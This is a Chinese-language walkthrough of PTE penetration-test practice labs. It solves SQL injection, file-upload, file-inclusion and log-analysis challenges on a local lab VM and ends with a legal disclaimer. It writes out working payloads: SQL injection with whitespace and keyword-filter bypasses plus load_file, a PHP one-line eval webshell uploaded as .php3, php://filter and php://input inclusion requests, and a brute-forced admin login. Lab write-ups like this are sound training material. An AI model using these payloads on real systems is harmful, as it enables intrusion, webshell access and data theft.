靶场下载链接： https://pan.baidu.com/s/1ce1Kk0hSYlxrUoRTnNsiKA?pwd=ha1x

pte-2003密码：admin123     centos:root admin123    解压密码：  PTE考试专用

下载好后直接用vmware打开，有两个靶机，一个是基础题，还有个综合题。基础题是pte-centos6，综合题是pte-2003

打开基础题pte-centos6后用vim设置静态IP地址，虚拟机用net模式的话，就设置与你虚拟机同一个网段 vim /etc/sysconfig/network-scripts/ifcfg-eth0 设置好后reboot重启一下即可，然后访问81-85端口，共5题。因为靶场出了问题，只能打开第一题，建议按照原网络环境去设置仅主机模式，原IP地址是172.16.12.100,虚拟机中的攻击机也可以配置同网段仅主机模式即可，问题不大。pet-2003设置net模式就好了，发现用桥接模式扫描端口失败  

//临时关闭防火墙 service iptables stop

//禁止开机启动 chkconfig iptables off

基础题目之SQL注入

http://10.0.0.110:81/

进入答题 

1、利用order by获取查询列数信息 

 根据提示：select * from article where id= ('1')；需闭合参数1')后插入sql查询语句 order by 4，后注释后面内容#

语句为： 1') order by 4#

填写空格会自动消除；在mysql中%0a是换行，可以代替空格；#url编码为%23

http://10.0.0.110:81/vulnerabilities/fu1.php?id=1%27)%0aorder%0aby%0a5%23

order by 5报错；（为查询是否有5个列）

http://10.0.0.110:81/vulnerabilities/fu1.php?id=1%27)%0aorder%0aby%0a4%23

order by 4显示内容；（证明article表有4个列） 

2、 联合查询探测回显数据

http://10.0.0.110:81/vulnerabilities/fu1.php?id=-1%27)%0aUNIunionON%0aselect%0a1,2,3,4%23

id=-1是尝试利用的一个注入点，通过传递一个非法的ID值来触发错误。

UNION注入:UNIunionON (union通过双写大小写绕过）

注入SQL查询：select 1,2,3,4%23

3、用load_file()函数【读取/tmp/360/key文件】

load_file()是MySQL中的一个内置函数，用于从服务器文件系统中读取文件内容

http://10.0.0.110:81/vulnerabilities/fu1.php?id=-1%27)%0aUNIunionON%0aselect%0a1,load_file(%27/tmp/360/key%27),3,4%23

select * from article where id= ('-1') UNION select 1,load_file('/tmp/360/key'),3,4#')

4、 成功获取key

key:8b3h4a7v

---

基础题目之文件上传突破

http://10.0.0.110:82/

 文件上传漏洞是指用户上传了一个可执行的脚本文件，并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的，“文件上传”本身没有问题，有问题的是文件上传后，服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全，则会导致严重的后果。

    通过你所学到的知识，测试其过WAF滤规则，突破上传获取webshell，答案就在根目录下key.php文件中。

1、尝试上传正常照片

 2、照片插入写入一句话木马

使用【edjpgcom】工具插入一句话

<?php @eval($_POST['chopper']);?>

 3、bp抓包改后缀名为php3

后缀名写为php被拦截，改为php3特殊格式成功绕过（php2、php3、php4、phtml）

 4、蚁剑远程webshell

http://10.0.0.110:82/vulnerabilities/12.php3

5、成功获取key

key:8t5s0x5t

---

基础题目之文件包含

http://10.0.0.110:83/

    PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时，由于传入的文件名没有经过合理的校验，从而操作了预想之外的文件，就可能导致意外的文件泄露甚至恶意的代码注入。

    通过你所学到的知识，测试该网站可能存在的包含漏洞，尝试获取webshell，答案就在根目录下key.php文件中。

进入答题：

http://10.0.0.110:83/vulnerabilities/fu1.php?file=view.html

1、读文件

http://10.0.0.110:83/vulnerabilities/fu1.php?file=php://filter/read=convert.base64-encode/resource=../key.php

• php://filter: 是PHP中的一个输入流过滤器，允许在读取文件内容之前对其进行处理。
• read=convert.base64-encode: 指定了过滤器的行为，即读取的内容将被转换为Base64编码。
• resource=../key.php: 指定要读取的资源文件路径。这里的../表示上一级目录，意味着尝试访问当前目录的父目录下的key.php文件。

2、base64解码：

3、成功获取key

key:6u3x9t2p

---

 方式二：

 1、上传一句话木马

GET /vulnerabilities/fu1.php?file=php://input HTTP/1.1
Host: 10.0.0.110:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.0.0.110:83/vulnerabilities/fu1.php?file=page=php://filter/read=convert.base64-encode/resource=../key.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Length: 67

<?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');?>

2、 蚁剑webshell

http://10.0.0.110:83/vulnerabilities/shell.php

 

 3、成功获取key

key:6u3x9t2p

---

基础题目之日志分析

分析得知有大量访问adminlogin.php

发现有一个登录页面 

Bp抓包进行暴力破解，获得用户名和密码 

暴力破解到用户名和密码

用户名：admin   密码：password123

登录得到key

 成功获取key：9y6u8s5m

---

声明：

• 此文章只做技术研究，谨遵守国家相关法律法规，请勿用于违法用途，如果您对文章内容有疑问，可以尝试留言私信，如有侵权请联系小编处理。